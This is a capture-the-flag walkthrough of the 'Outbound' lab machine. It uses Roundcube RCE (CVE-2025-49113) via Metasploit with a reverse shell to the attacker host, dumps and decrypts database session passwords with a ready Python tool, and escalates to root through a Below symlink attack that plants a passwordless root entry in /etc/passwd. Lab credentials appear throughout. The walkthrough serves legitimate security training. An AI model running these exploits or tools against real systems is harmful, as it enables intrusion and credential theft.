Outbound
💡 Machine Information
As is common in real life pentests, you will start the Outbound box with
credentials for the following account tyler / LhKL1o9Nm3X2
Initial Nmap Scan:
nmap -A -p- 10.10.11.77 -T4
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-13 00:00 +05
Nmap scan report for 10.10.11.77
Host is up (0.090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protoco
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_k
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 89.37 ms 10.10.14.1
2 89.69 ms 10.10.11.77
OS and Service detection performed. Please report any incorrect results at https:
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds
Initial Access - Roundcube RCE (CVE-2025-49113)
The target was found to be running Roundcube 1.6.10, which is vulnerable to authenticated remote code execution (CVE-2025-49113, fixed in 1.6.11 and 1.5.10): the _from parameter handled by program/actions/settings/upload.php is not validated and reaches PHP object deserialization, so any valid webmail login is enough to get code execution as the web server user. The provided tyler account satisfies that authentication requirement.
Credentials Provided:
tyler / LhKL1o9Nm3X2
Reference: Roundcube 1.6.10 - Remote Code Execution (RCE), CVE-2025-49113, webapps exploit for multiple platforms: https://www.exploit-db.com/exploits/52324
Exploit Used:
Roundcube Authenticated RCE (CVE-2025-49113)
Used the Metasploit module exploit/multi/http/roundcube_auth_rce_cve_2025_49113 with tyler's credentials, VHOST set to mail.outbound.htb (port 80 redirects there) and a linux/x64/meterpreter/reverse_tcp payload:
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > options
Module options (exploit/multi/http/roundcube_auth_rce_cve_2025_49113):
Name Current Setting Required Description
---- --------------- -------- -----------
HOST no The hostname of Roundcube se
PASSWORD LhKL1o9Nm3X2 yes Password to login w
Proxies no A proxy chain of format type:hos
RHOSTS 10.10.11.77 yes The target host(s), see http
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing
SSLCert no Path to a custom SSL certificate
TARGETURI http://mail.outbound.htb/?_task=mail&_mbox=INBOX yes The
URIPATH no The URI to use for this exploit (
USERNAME tyler yes Email User to login with
VHOST mail.outbound.htb no HTTP server virtual hos
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.18 yes The listen address (an interface may be specified
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Dropper
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) >
Post-Exploitation - Database Credential Dump
From the shell obtained as the web server user, the Roundcube config.inc.php gave the MySQL DSN (user roundcube, password RCDBPass2025):
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube
💡 The same config sets $config['des_key'] = 'rcmail-!24ByteDESkey*Str'. That is Roundcube's shipped default value, so the instance never changed it, and anything Roundcube encrypted with it can be recovered with the key alone.
Logged into MySQL with those credentials and dumped the session table; the vars column holds each user's serialized session, which includes the IMAP password encrypted with des_key:
USE roundcube;
SELECT * FROM session;
💡 Encrypted password found in the session vars: L7Rv00A8TuwJAr67kITxxcSGnIk25Am/
Decrypting User Password from DB (DES3 CBC):
Extracted encrypted string: L7Rv00A8TuwJAr67kITxxcSGnIk25Am/
Roundcube's rcube::encrypt() emits base64(IV || DES-EDE3-CBC ciphertext) with an 8-byte IV and PKCS#7 padding, so the known des_key is all that is needed. Decryption script:
cat script.py
# Decrypt a Roundcube session password: base64(IV || DES-EDE3-CBC ciphertext),
# keyed with the des_key from config.inc.php. Needs pycryptodome.
from base64 import b64decode
from Crypto.Cipher import DES3

encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"  # from the session table
des_key = b'rcmail-!24ByteDESkey*Str'                     # from config.inc.php (Roundcube's default)

data = b64decode(encrypted_password)
iv = data[:8]            # rcube::encrypt() prepends an 8-byte IV
ciphertext = data[8:]
cipher = DES3.new(des_key, DES3.MODE_CBC, iv)
decrypted = cipher.decrypt(ciphertext)

# openssl_encrypt() applies PKCS#7 padding: the last byte is the pad length,
# and every pad byte carries that value. Validating it catches a wrong key
# instead of printing invisible control characters along with the password.
pad = decrypted[-1]
if not 1 <= pad <= 8 or decrypted[-pad:] != bytes([pad]) * pad:
    raise SystemExit("[-] Bad padding: wrong key or corrupted ciphertext")
cleaned = decrypted[:-pad].decode('utf-8')
print("[+] Password:", cleaned)
Running it:
┌──(po-venv)─(grover㉿Grover)-[~/HTB/Outbound]
└─$ python3 script.py
[+] Password: 595mO8DmwGeD
Recovered Password: 595mO8DmwGeD
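A more general version of that decryption, as an added example that is not part of the original writeup: it cuts the password entry out of the session vars blob the way Roundcube stores it (base64 of PHP session serialization, with the IMAP password as a password|s:N:"..." entry produced by rcube::encrypt() as base64(IV || DES-EDE3-CBC)), validates the PKCS#7 padding so a wrong key is reported instead of silently yielding garbage, and runs against a session row that is constructed inside the script rather than taken from the target. The entry layout of that sample row and the helper names are mine; DES3 comes from pycryptodome.

```python
"""Recover Roundcube IMAP passwords from dumped session rows.

Added example, not code from the original writeup. Roundcube stores each
login's password inside the PHP session (the `vars` column of the `session`
table: base64 of PHP session serialization), encrypted by rcube::encrypt():
    base64( IV || DES-EDE3-CBC(des_key, PKCS#7-padded password) ),  IV = 8 bytes
The session row used below is constructed here, not taken from the target.
"""
import base64
import os
import re
from typing import Optional

try:
    from Crypto.Cipher import DES3          # pycryptodome
except ImportError:                         # parsing/unpadding still work without it
    DES3 = None

BLOCK = 8   # DES block size, and the IV length rcube::encrypt() prepends


def pkcs7_unpad(data: bytes, block: int = BLOCK) -> bytes:
    """Strip and validate PKCS#7 padding (what openssl_encrypt() applies).
    A wrong key almost always fails here instead of yielding silent garbage."""
    if not data or len(data) % block:
        raise ValueError("length is not a multiple of the block size")
    pad = data[-1]
    if not 1 <= pad <= block or data[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong key or corrupted data")
    return data[:-pad]


def extract_session_string(vars_b64: str, name: str) -> Optional[str]:
    """Pull one string entry (name|s:N:"...";) out of a session blob.
    The blob also holds nested arrays, so instead of a full PHP
    unserializer the entry's own length prefix is used to cut it out,
    which also copes with quotes or ';' inside the value."""
    raw = base64.b64decode(vars_b64)
    m = re.search(rb'(?:^|[;}])' + re.escape(name.encode()) + rb'\|s:(\d+):"', raw)
    if not m:
        return None
    n = int(m.group(1))
    return raw[m.end():m.end() + n].decode()


def roundcube_decrypt(token: str, des_key: bytes) -> str:
    """Inverse of rcube::encrypt(): base64 -> IV||cipher -> 3DES-CBC -> unpad."""
    if DES3 is None:
        raise RuntimeError("pycryptodome is required for DES3")
    blob = base64.b64decode(token)
    iv, cipher = blob[:BLOCK], blob[BLOCK:]
    plain = DES3.new(des_key, DES3.MODE_CBC, iv).decrypt(cipher)
    return pkcs7_unpad(plain).decode()


def roundcube_encrypt(password: str, des_key: bytes, iv: Optional[bytes] = None) -> str:
    """Mirror of rcube::encrypt(); only used here to build the constructed sample."""
    if DES3 is None:
        raise RuntimeError("pycryptodome is required for DES3")
    iv = iv or os.urandom(BLOCK)
    data = password.encode()
    pad = BLOCK - len(data) % BLOCK
    cipher = DES3.new(des_key, DES3.MODE_CBC, iv).encrypt(data + bytes([pad]) * pad)
    return base64.b64encode(iv + cipher).decode()


def build_session_blob(username: str, token: str) -> str:
    """Constructed session row in Roundcube's layout (the entry set is illustrative)."""
    php = (
        b'language|s:5:"en_US";'
        + b'username|s:%d:"%s";' % (len(username), username.encode())
        + b'password|s:%d:"%s";' % (len(token), token.encode())
        + b'imap_namespace|a:1:{s:8:"personal";a:1:{i:0;a:2:{i:0;s:0:"";i:1;s:1:".";}}}'
    )
    return base64.b64encode(php).decode()


if __name__ == "__main__":
    key = b"rcmail-!24ByteDESkey*Str"                 # Roundcube's default des_key
    token = roundcube_encrypt("595mO8DmwGeD", key)    # constructed, not the target's row
    blob = build_session_blob("jacob", token)
    user = extract_session_string(blob, "username")
    print("[+] %s: %s" % (user, roundcube_decrypt(extract_session_string(blob, "password"), key)))
```

To use it on a real dump, pass the vars column of each session row to extract_session_string() and the result to roundcube_decrypt() with the des_key from config.inc.php; a padding error on every row means the key is not the one that instance used.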
Lateral Movement - User: Jacob
SSH into the machine as jacob with the recovered password 595mO8DmwGeD, or su to jacob from the existing shell.
Discovered jacob's mailbox, an mbox file (not a directory) at /home/jacob/mail/INBOX/jacob:
jacob@mail:~$ ls
mail
jacob@mail:~$ cd mail
jacob@mail:~/mail$ ls
INBOX Trash
jacob@mail:~/mail$ ls -la
total 36
drwx------ 1 jacob jacob 4096 Jul 9 12:41 .
drwxr-x--- 1 jacob jacob 4096 Jun 7 13:55 ..
drwx------ 1 jacob jacob 4096 Jul 9 12:41 .imap
-rw------- 1 jacob jacob 11 Jun 7 13:59 .subscriptions
drwxrwx--- 3 jacob jacob 4096 Jul 9 12:41 INBOX
-rw------- 1 jacob jacob 528 Jun 7 13:59 Trash
jacob@mail:~/mail$ cd INBOX
jacob@mail:~/mail/INBOX$ ls
jacob
jacob@mail:~/mail/INBOX$ cd jacob
bash: cd: jacob: Not a directory
jacob@mail:~/mail/INBOX$ cat jacob
From tyler@outbound.htb Sat Jun 07 14:00:58 2025
Return-Path: <tyler@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb
Received: by outbound.htb (Postfix, from userid 1000)
id B32C410248D; Sat, 7 Jun 2025 14:00:58 +0000 (UTC)
To: jacob@outbound.htb
Subject: Important Update
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20250607140058.B32C410248D@outbound.htb>
Date: Sat, 7 Jun 2025 14:00:58 +0000 (UTC)
From: tyler@outbound.htb
X-IMAPbase: 1749304753 0000000002
X-UID: 1
Status:
X-Keywords:
Content-Length: 233
Due to the recent change of policies your password has been changed.
Please use the following credentials to log into your account: gY4Wr3a1evp4
Remember to change your password when you next log into your account.
Thanks!
Tyler
From mel@outbound.htb Sun Jun 08 12:09:45 2025
Return-Path: <mel@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb
Received: by outbound.htb (Postfix, from userid 1002)
id 1487E22C; Sun, 8 Jun 2025 12:09:45 +0000 (UTC)
To: jacob@outbound.htb
Subject: Unexpected Resource Consumption
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20250608120945.1487E22C@outbound.htb>
Date: Sun, 8 Jun 2025 12:09:45 +0000 (UTC)
From: mel@outbound.htb
X-UID: 2
Status:
X-Keywords:
Content-Length: 261
We have been experiencing high resource consumption on our main server.
For now we have enabled resource monitoring with Below and have granted you
Please inform us immediately if you notice any irregularities.
Thanks!
Mel
jacob@mail:~/mail/INBOX$
Read internal mails:
Mail from Tyler with jacob's new password: gY4Wr3a1evp4
Mail from Mel: resource monitoring with Below has been enabled on the server and jacob has been granted access to it, which points at the privilege escalation path.
💡 gY4Wr3a1evp4
Privilege Escalation - Below Log Symlink Abuse (CVE-2025-27591)
Below runs as root and writes its error log to /var/log/below/error_root.log, while /var/log/below itself is writable by unprivileged users. Replacing that log with a symlink to /etc/passwd makes root-run Below operate on /etc/passwd instead of its own log file, after which jacob can write to it. A passwd entry for a second UID-0 user with an empty password field is then planted, and su to that user gives a root shell without a password prompt.
echo 'pwn::0:0:pwn:/root:/bin/bash' > /tmp/fakepass
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
cp /tmp/fakepass /var/log/below/error_root.log
su pwn
Created the fake root user pwn and logged in with su pwn.
Outcome: full root shell achieved.
Two caveats for a real engagement: the cp only succeeds once Below has been run as root with the symlink in place (before that /etc/passwd is still root-owned 0644 and the write is denied), and cp truncates /etc/passwd to that single line, wiping every other account. Appending the entry instead (cat /tmp/fakepass >> /var/log/below/error_root.log), then removing the symlink and restoring the log file, is the less destructive route.
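The bug class behind this escalation, as an added example that is not from the writeup or from the Below project: a privileged process that opens a log inside a user-writable directory with a plain open() follows a planted symlink, whereas opening with O_NOFOLLOW and checking the opened file with fstat refuses it. The script runs both openers in a throwaway temp directory that stands in for /var/log/below and /etc/passwd (nothing on the real system is touched); the directory layout, the file names and the audit helper are mine.

```python
"""Symlink-following log writer beside a hardened one (added example, not
code from the writeup or from the below project). Models the bug class
behind the Below escalation: a root process opens a log file inside a
directory unprivileged users can write to, so a planted symlink redirects
the open to /etc/passwd. Everything here runs in a throwaway temp directory.
"""
import os
import stat
import tempfile

LOG_FLAGS = os.O_WRONLY | os.O_CREAT | os.O_APPEND


def open_log_unsafe(path: str) -> int:
    """The vulnerable pattern: open(2) follows whatever sits at `path`."""
    return os.open(path, LOG_FLAGS, 0o644)


def open_log_safe(path: str, expected_uid: int) -> int:
    """Hardened open for a privileged logger: refuse symlinks (O_NOFOLLOW,
    fails with ELOOP), don't leak the fd (O_CLOEXEC), and verify what was
    actually opened before writing a byte. Never chmod the log to 0666."""
    fd = os.open(path, LOG_FLAGS | os.O_NOFOLLOW | os.O_CLOEXEC, 0o644)
    try:
        st = os.fstat(fd)   # inspect the opened object, not the path (avoids TOCTOU)
        if not stat.S_ISREG(st.st_mode):
            raise OSError("log is not a regular file")
        if st.st_nlink != 1:
            raise OSError("log has extra hard links")
        if st.st_uid != expected_uid:
            raise OSError("log is owned by another user")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise OSError("log is group/world writable")
    except OSError:
        os.close(fd)
        raise
    return fd


def audit_log_dir(logdir: str) -> list:
    """Defender's check: conditions that let a local user hijack the log."""
    findings = []
    if os.stat(logdir).st_mode & stat.S_IWOTH:
        findings.append("directory is world-writable")
    for name in os.listdir(logdir):
        p = os.path.join(logdir, name)
        if os.path.islink(p):
            findings.append("%s is a symlink to %s" % (name, os.readlink(p)))
    return findings


def simulate(plant_symlink: bool):
    """Run both openers in one scenario.

    Returns (target_modified, safe_open_refused, audit_findings).
    The fake /etc/passwd and log directory are constructed here.
    """
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "passwd")          # stand-in for /etc/passwd
        logdir = os.path.join(d, "below")           # stand-in for /var/log/below
        os.mkdir(logdir)
        os.chmod(logdir, 0o777)                     # the world-writable directory
        log = os.path.join(logdir, "error_root.log")
        with open(target, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        if plant_symlink:
            os.symlink(target, log)                 # what the attacker does

        fd = open_log_unsafe(log)                   # "root" writes its log
        os.write(fd, b"pwn::0:0:pwn:/root:/bin/bash\n")
        os.close(fd)
        with open(target) as f:
            target_modified = "pwn::0:0" in f.read()

        try:
            os.close(open_log_safe(log, os.getuid()))
            safe_refused = False
        except OSError:                             # ELOOP on the planted symlink
            safe_refused = True
        return target_modified, safe_refused, audit_log_dir(logdir)


if __name__ == "__main__":
    for planted in (False, True):
        print("symlink planted:", planted, "->", simulate(planted))
```

The same audit_log_dir() checks, run against the real /var/log/below, are a quick way to confirm the preconditions on a target before setting up the symlink, and for a defender to spot the planted link afterwards.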